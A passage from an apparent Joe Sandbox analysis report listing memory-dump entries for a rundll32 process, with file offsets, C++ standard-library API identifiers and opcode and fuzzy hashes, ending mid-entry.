                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: char_traits
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1158913984-0
                                                                                                                                                                                • Opcode ID: 62264f4c2282442cdc3c1f905bd9bad1ff7143b47ade65a719556a1dd44444ed
                                                                                                                                                                                • Instruction ID: e093fb1e87859218ba6d732702b7ed03fe23ec8fd487dfeda1aff39e4b2d3743
                                                                                                                                                                                • Opcode Fuzzy Hash: 62264f4c2282442cdc3c1f905bd9bad1ff7143b47ade65a719556a1dd44444ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 43B10276118EC080EB62DB65E4553EEA3E2F7D4788F500116EAC987A9BEF78C584CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: 3b1c8ff64b7d1c49a48d49447f4a4cc82ffe0b5f30dff20e234f5227c1eb22de
                                                                                                                                                                                • Instruction ID: 5ec2a7b8424fe54ecabc1950c5377a53ea9b6d6d9b5333b888c135cde0e5f1dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b1c8ff64b7d1c49a48d49447f4a4cc82ffe0b5f30dff20e234f5227c1eb22de
                                                                                                                                                                                • Instruction Fuzzy Hash: 4341C031508E498FF754EB28D484BEE73F2FBA8314F18056DA50BC32A6DA34D841CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: c2f1e7ce1e411251038a4074910defcb6052e1f5b50779ecea276810bcf71a42
                                                                                                                                                                                • Instruction ID: 8f837c91bf4afe7fe540cbf487de06d69d75759517e3f9bf0d52aa5f1706b9b6
                                                                                                                                                                                • Opcode Fuzzy Hash: c2f1e7ce1e411251038a4074910defcb6052e1f5b50779ecea276810bcf71a42
                                                                                                                                                                                • Instruction Fuzzy Hash: C7418031209E598FE755EB28D484BEE73F2FBA4314F54057EA84AC31A6DA30D845C7C2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: d42b49580f59bf9ee5cacfae17bbef844d338c838c87811a0b20812210dc57c3
                                                                                                                                                                                • Instruction ID: cca26430d342e3604a67a9344ae0c911827018a4bd50ab93cf476f820771fefb
                                                                                                                                                                                • Opcode Fuzzy Hash: d42b49580f59bf9ee5cacfae17bbef844d338c838c87811a0b20812210dc57c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 9841B471209E498FE764EB28D485BEE73F2FB98314F55056EA41AC31A1DA70DC45CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3320480354-0
                                                                                                                                                                                • Opcode ID: 26618e56ba12d3068fdef7dd0408fe412cbf25b8add2ed8ae57410b806273332
                                                                                                                                                                                • Instruction ID: 72db4be06d6a8f04c6007b3cbda1882fab6a2c5aa1f3781506828d846578878a
                                                                                                                                                                                • Opcode Fuzzy Hash: 26618e56ba12d3068fdef7dd0408fe412cbf25b8add2ed8ae57410b806273332
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E41C330508E998FE754EB18D494BEE73F2FBA9314F58056EA44EC32A6DE30D841CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 5b16358a03fb93621077fd88fa80582328bbc92a55aaa43dc3b6893833c7adb2
                                                                                                                                                                                • Instruction ID: 2702d6299afd7cb2d8254b3d947bffab7c9345f5df5b9f16dc7d0e598a6be83b
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b16358a03fb93621077fd88fa80582328bbc92a55aaa43dc3b6893833c7adb2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6541C531209E598FE755EB1CD490BEE73F2FB68314F54056EA80AC31A2CA30D845C7C2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 7ad4993a8b174b8363bb7502690be3ae1b561dbc89bbd99c915c9381e914f89e
                                                                                                                                                                                • Instruction ID: 909ddc305456e90cf1e925b16df347582f3426a9642a8bbe9dce6815a26cd756
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ad4993a8b174b8363bb7502690be3ae1b561dbc89bbd99c915c9381e914f89e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41E530609E494FE758EF18D4847EE73F2FB58314F18466EA41AC32A6CA70D805CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 3e8bbe698a1bf48928fd66137138659e259b7ccdec2d8507b5c72f1779f4d2df
                                                                                                                                                                                • Instruction ID: e2bc325e0550a3ef72d57f3a3af3fe4718021beb519b6a1a43e46be7fbda2f19
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8bbe698a1bf48928fd66137138659e259b7ccdec2d8507b5c72f1779f4d2df
                                                                                                                                                                                • Instruction Fuzzy Hash: 7441B431508E498FE794EB28D494BDE73F2FBA5324F58056EA51EC32A6CE30D805CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3240839640-0
                                                                                                                                                                                • Opcode ID: 60f3d123f906e935d9828c950a9bb343b450096d505eb81e70dd43da5b441a09
                                                                                                                                                                                • Instruction ID: 8e3173b93029275a0f822949533775e3714e45292d67b54c42c1d02ec893f40e
                                                                                                                                                                                • Opcode Fuzzy Hash: 60f3d123f906e935d9828c950a9bb343b450096d505eb81e70dd43da5b441a09
                                                                                                                                                                                • Instruction Fuzzy Hash: A041B231109E588FE755EB18D4907EE73F2FBA8314F54066EA80AC31A2CA30DC45CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: abd0f29150cea064db7ea93e3bd1444df1ce42a532174cbae03d5b6ef2ad6a86
                                                                                                                                                                                • Instruction ID: 43860751056afaf79417f0e06dca88e1441ab89665fdd020be6ce4f5fab5b9f2
                                                                                                                                                                                • Opcode Fuzzy Hash: abd0f29150cea064db7ea93e3bd1444df1ce42a532174cbae03d5b6ef2ad6a86
                                                                                                                                                                                • Instruction Fuzzy Hash: D141B431908E594FE754EB28D485BEE73F2FBA8314F58066EA40EC32A6CE30D845C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 915cf86895ac07d937b62642654921994e7e6139a02f3fdf34537d2804a32b4b
                                                                                                                                                                                • Instruction ID: 09f342d1025f4b51031b0e81266363f2d27e24c27b024265c0763a0999239265
                                                                                                                                                                                • Opcode Fuzzy Hash: 915cf86895ac07d937b62642654921994e7e6139a02f3fdf34537d2804a32b4b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41B431119E694FE754EF1DD494BEE73F2FBA4314F54066EA44AC31A6CA30D905CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: 77321c750d283a068eef52474f1328485b1adbfdf4c2edc2983fef81da2ed23e
                                                                                                                                                                                • Instruction ID: 592f75c0b0be54c92fc3dfa7075de67d989f6adf6db285cff11db8a69665e6a8
                                                                                                                                                                                • Opcode Fuzzy Hash: 77321c750d283a068eef52474f1328485b1adbfdf4c2edc2983fef81da2ed23e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6641A231209E494FE754EB28D495BEE73F2FBA4314F58066EA40AC31A6DA70D805CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4068408745-0
                                                                                                                                                                                • Opcode ID: 441b8e41e1d8b8a705fa5094bdd223caa96ea1b284aea36a97238e43f629e6f4
                                                                                                                                                                                • Instruction ID: d363977ec4ddbed90e47318af70bcdc2fc981915c80e44ee6359429abb956b75
                                                                                                                                                                                • Opcode Fuzzy Hash: 441b8e41e1d8b8a705fa5094bdd223caa96ea1b284aea36a97238e43f629e6f4
                                                                                                                                                                                • Instruction Fuzzy Hash: DE41C331619E594FE754EB19D484BEE73F2FBA8314F14066EA40AC31A2CA70D805CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3320480354-0
                                                                                                                                                                                • Opcode ID: 399c9e31cdefa6e34355b3389e5769c9eacfa5db4b9d05f97f7b15c89971f269
                                                                                                                                                                                • Instruction ID: 977af521501a41c71b0adafeff386a7f977d5509a000f8e97db1563da1ad2476
                                                                                                                                                                                • Opcode Fuzzy Hash: 399c9e31cdefa6e34355b3389e5769c9eacfa5db4b9d05f97f7b15c89971f269
                                                                                                                                                                                • Instruction Fuzzy Hash: BE41A231109E598FE755EB28D494BEE73F2FB68314F54066EA81AC31A6DA30DC45CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: f056f9edf8a4f6c957cdc38cd9e619afd480da16a60ef54abf923e9647275c7d
                                                                                                                                                                                • Instruction ID: 6ad15c7f7fda2aee9668a7263c1749f702eae16993c1d4184e64e8f8616252dd
                                                                                                                                                                                • Opcode Fuzzy Hash: f056f9edf8a4f6c957cdc38cd9e619afd480da16a60ef54abf923e9647275c7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1441A131518E484FE7A5EB18D484BEE77F2FBA8354F18056DA80AC31A6CA34DD41CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: 7860dc70e9bf5cc0d0039a70ddbee0ae88935c02dea494e287fd0833cf40dded
                                                                                                                                                                                • Instruction ID: 2aa8b4507cf6c087ca85fdf8606bf09243d6cd8704ddf6b0deaaa33e7503f7ac
                                                                                                                                                                                • Opcode Fuzzy Hash: 7860dc70e9bf5cc0d0039a70ddbee0ae88935c02dea494e287fd0833cf40dded
                                                                                                                                                                                • Instruction Fuzzy Hash: A6419F31209E498FE755EB18D494BEE73F2FB64314F14066EA44AC31A6CA70DC45CBC6
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 5cfbe0f19a11e7d9f6b8e2c9b460ff2103601be7b6c7b550dceed3157f851894
                                                                                                                                                                                • Instruction ID: 18d43dc0612722645f3c20c874a01f28e25531598d08b895417b0382cf20a007
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cfbe0f19a11e7d9f6b8e2c9b460ff2103601be7b6c7b550dceed3157f851894
                                                                                                                                                                                • Instruction Fuzzy Hash: 93418231619F494FE754EF18D484BEE73F2FBA4324F54066EA45AC31A5CA70D905CB82
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4068408745-0
                                                                                                                                                                                • Opcode ID: 7040e9f09c21cb0afca421e897f27dcdacf665d9cacd4426a9b98b6e033285e0
                                                                                                                                                                                • Instruction ID: e63027fbddd269f0b6d3a9b2e186b934f83d8cf303840885a3794e435677aeea
                                                                                                                                                                                • Opcode Fuzzy Hash: 7040e9f09c21cb0afca421e897f27dcdacf665d9cacd4426a9b98b6e033285e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41B231119E594FE764EB28D494BEE73F3FBA4314F58066EA50AC31A6DA70D805CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4068408745-0
                                                                                                                                                                                • Opcode ID: d3f43ab89e984d6a3700269965d375e20708ad9f940fdae27254e6f2a65f332c
                                                                                                                                                                                • Instruction ID: 946b0a4a0a977bcca585ea4b0089e505c28fef6f0ac0de86b7f2087c3e6a2c73
                                                                                                                                                                                • Opcode Fuzzy Hash: d3f43ab89e984d6a3700269965d375e20708ad9f940fdae27254e6f2a65f332c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4041E731908E998FE754EF18D4957EE73F2FB54314F58456EA44EC31A6CA30D805D781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 6f298ffa6e497c2eaaf01785e43fc4dce3c4a55519c401323b13ede0ce761a3d
                                                                                                                                                                                • Instruction ID: ca436bbc7e54c2c48ff6c893bbf9a177f94015634aad9fbb802c64ec8f7e6b6a
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f298ffa6e497c2eaaf01785e43fc4dce3c4a55519c401323b13ede0ce761a3d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41B331508E498FE764EB28D490BED73F3FBA8314F58056EA51AD31A6CA34DC42CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 14be1b1fd9718fc3f34adfb3cbca17648e58064d730dfa3a608ea707c9c1eaf3
                                                                                                                                                                                • Instruction ID: be0a820e104ba65090ad5cd58c749c44eee1b4c1d61c46de1493515ac47737c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 14be1b1fd9718fc3f34adfb3cbca17648e58064d730dfa3a608ea707c9c1eaf3
                                                                                                                                                                                • Instruction Fuzzy Hash: 37418131119E598FE764EF18D4847EE73F3FBA8314F54056EA91AC31A6CA60D845CB81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: e16598f94629519630b94ae800744cf899b351421400b9fa78f81e17fa1edaa5
                                                                                                                                                                                • Instruction ID: 6f037507b100abad3063706fdd5945951d59897e4091374a02e3a57a61df43d3
                                                                                                                                                                                • Opcode Fuzzy Hash: e16598f94629519630b94ae800744cf899b351421400b9fa78f81e17fa1edaa5
                                                                                                                                                                                • Instruction Fuzzy Hash: C841913160DE494FEB55EB18D494BEE73F2FB54314F58056EA44AC31A5DE60D805CBC2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: 41d49ad4b7121165f543fc67f64dc3071c0984782cb30c3a214f00ddd9751a84
                                                                                                                                                                                • Instruction ID: 46a3531e6b1a3d8861fcd1f5d581f8b6790babd0df8e285efca43780efd21a25
                                                                                                                                                                                • Opcode Fuzzy Hash: 41d49ad4b7121165f543fc67f64dc3071c0984782cb30c3a214f00ddd9751a84
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E41B231918E598FE754EB68D494BEE73F2FB65314F58066EA85EC32A2CE30D805C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3240839640-0
                                                                                                                                                                                • Opcode ID: b689417173be9a58d7525dd7f69df29017bd0b297875d8cf91ba4b2357bb2b2e
                                                                                                                                                                                • Instruction ID: f3c94278e0b1481a0ec315bb57e23e730df8708eb3fa32664a3a4e3a40da9714
                                                                                                                                                                                • Opcode Fuzzy Hash: b689417173be9a58d7525dd7f69df29017bd0b297875d8cf91ba4b2357bb2b2e
                                                                                                                                                                                • Instruction Fuzzy Hash: CA41B331508E484FE795EB28D484BEE73F2FB94314F1C056EA40AD32A6CA34DA45C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 620047600-0
                                                                                                                                                                                • Opcode ID: d9cb5c1c6ae06c0d428bbbd94a39445ef9bd2be3a68fcd0c49b05d0f5fcf55f6
                                                                                                                                                                                • Instruction ID: 902648a6b2b9555253df24a5145f36998c18f8d63f40715979818437160aac24
                                                                                                                                                                                • Opcode Fuzzy Hash: d9cb5c1c6ae06c0d428bbbd94a39445ef9bd2be3a68fcd0c49b05d0f5fcf55f6
                                                                                                                                                                                • Instruction Fuzzy Hash: C741A631109E598FE764EB18D494BEE73F2FB64314F58056EA40AC31A6CA30D945C7C1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3809448442-0
                                                                                                                                                                                • Opcode ID: f8b94c656457c1187a9d8cbcd32f96ed1970e85c5a83aee131887960ce47540c
                                                                                                                                                                                • Instruction ID: 94ee7cf4729a45c3de63f3c5ca9a2419a4916238904c70e58a206f2f37712925
                                                                                                                                                                                • Opcode Fuzzy Hash: f8b94c656457c1187a9d8cbcd32f96ed1970e85c5a83aee131887960ce47540c
